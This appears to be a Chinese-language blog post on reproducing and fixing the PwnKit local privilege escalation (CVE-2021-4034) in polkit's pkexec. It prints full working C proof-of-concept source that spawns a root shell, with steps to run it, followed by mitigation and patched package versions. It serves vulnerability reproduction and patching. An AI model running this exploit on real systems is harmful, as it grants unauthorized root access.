cve-2021-4034修复和复现方法

一、cve-2021-4034问题背景

关于 Polkit pkexec for Linux
Polkit(以前称为 PolicyKit)是一个用于在类 Unix 操作系统中控制系统范围权限的组件。它为非特权进程与特权进程通信提供了一种有组织的方式。也可以使用 polkit 执行具有提升权限的命令,使用命令 pkexec 后要执行的命令(具有 root 权限)。

PwnKit 漏洞的潜在影响
成功利用此漏洞允许任何非特权用户在易受攻击的主机上获得 root 特权。Qualys 安全研究人员已经能够独立验证漏洞,开发漏洞利用,并在默认安装的 Ubuntu、Debian、Fedora 和 CentOS 上获得完整的 root 权限。其他 Linux 发行版可能容易受到攻击并且可能被利用。这个漏洞已经隐藏了 12 年多,并影响自 2009 年 5 月第一个版本以来的所有 pkexec 版本(commit c8c3d83,“Add a pkexec(1) command”)。

**

二、Bug复现

**
1、编译cve-2021-4034-poc程序
代码来自:https://github.com/arthepsy/CVE-2021-4034

cat /tmp/cve-2021-4034-poc.c
gcc /tmp/cve-2021-4034-poc.c -o /tmp/cve-2021-4034-poc
/*
 * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis 
 * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
 */
#include 
#include 
#include 

char *shell = 
	"#include \n"
	"#include \n"
	"#include \n\n"
	"void gconv() {}\n"
	"void gconv_init() {\n"
	"	setuid(0); setgid(0);\n"
	"	seteuid(0); setegid(0);\n"
	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
	"	exit(0);\n"
	"}";

int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}

2、创建普通用户

adduser duanshuaixing-cve-2021-4034
su duanshuaixing-cve-2021-4034
cd /tmp
./cve-2021-4034-poc

id
ls /root/

三、Bug修复

1、临时解决方法, 将pkexec中的SUID-bit删除进行临时规避

chmod 0755 /usr/bin/pkexec

2、永久解决方法

#centos
rpm -qa polkit
yum -y update polkit

ubuntu
dpkg -l |grep policykit
apt-get -y install policykit-1

3、centos和ubuntu的polkit修复版本

CentOS系列:
CentOS 6:polkit-0.96-11.el6_10.2
CentOS 7:polkit-0.112-26.el7_9.1
CentOS 8.0:polkit-0.115-13.el8_5.1
CentOS 8.2:polkit-0.115-11.el8_2.2
CentOS 8.4:polkit-0.115-11.el8_4.2

Ubuntu系列:
Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2
Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6
Ubuntu 16.04 ESM:policykit-1 - 0.105-14.1ubuntu0.5+esm1
Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1

你可能感兴趣的:(Linux,运维)